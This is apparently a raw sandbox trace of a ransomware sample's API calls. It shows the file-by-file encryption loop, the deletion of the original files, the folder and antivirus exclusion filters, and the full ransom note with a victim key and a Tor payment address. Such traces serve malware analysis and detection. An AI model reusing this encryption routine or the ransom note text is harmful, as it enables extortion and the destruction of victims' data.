nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.101] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.101] GetLastError () returned 0x0 [0161.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.101] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.101] GetLastError () returned 0x0 [0161.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.101] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.101] GetLastError () returned 0x0 [0161.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.102] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.102] GetLastError () returned 0x0 [0161.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.102] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.102] GetLastError () returned 0x0 [0161.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.102] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.102] GetLastError () returned 0x0 [0161.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.102] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.102] GetLastError () returned 0x0 [0161.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.102] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.102] GetLastError () returned 0x0 [0161.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.102] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.102] GetLastError () returned 0x0 [0161.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.102] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.102] GetLastError () returned 0x0 [0161.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.103] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.103] GetLastError () returned 0x0 [0161.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.103] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.103] GetLastError () returned 0x0 [0161.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.103] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.103] GetLastError () returned 0x0 [0161.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.103] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.103] GetLastError () returned 0x0 [0161.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.103] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.103] GetLastError () returned 0x0 [0161.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.103] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.103] GetLastError () returned 0x0 [0161.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.104] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.104] GetLastError () returned 0x0 [0161.104] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.104] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.104] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.104] GetLastError () returned 0x0 [0161.104] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.104] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.104] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0161.104] GetLastError () returned 0x0 [0161.104] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0161.104] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0161.104] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0161.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui")) returned 0x20 [0161.104] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0161.105] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui") returned 1 [0161.105] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui")) returned 0 [0161.105] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" [0161.105] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 1 [0161.105] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\.xXE8A7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\.xxe8a7.tmp")) returned 0xe8a7 [0161.106] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\.xXE8A7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\.xxe8a7.tmp"), dwFlags=0x1) returned 0 [0161.106] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\.xXE8A7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\.xxe8a7.tmp")) returned 1 [0161.106] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0161.107] wcslen (_String="OK") returned 0x2 [0161.107] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.107] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.107] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0161.107] CryptDestroyHash (hHash=0x9ad338) returned 1 [0161.107] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0161.107] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0161.107] GetLastError () returned 0x12 [0161.107] FindClose (in: hFindFile=0x9ad3b8 | out: hFindFile=0x9ad3b8) returned 1 [0161.107] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0161.107] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.108] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.108] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.108] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.108] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.108] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.108] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.108] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*.exe") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*.dll") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*.lnk") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*.bat") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*.ini") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*.msi") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*.scf") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*pagefile.sys*") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*AppData*") returned 0 [0161.108] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\winrar\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\java\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\windows\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\ESET\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\AVG\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*Atheros*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*Realtek*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*bootmgr*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*boot*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*boot*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*IO.SYS*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*ntldr*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*chrome*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*opera*") returned 0 [0161.109] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", pszSpec="*firefox*") returned 0 [0161.109] wcslen (_String="\\\\?\\") returned 0x4 [0161.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad578 [0161.109] wcscmp (_String1=".", _String2=".") returned 0 [0161.109] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.109] wcscmp (_String1="..", _String2=".") returned 1 [0161.109] wcscmp (_String1="..", _String2="..") returned 0 [0161.109] FindNextFileW (in: hFindFile=0x9ad578, 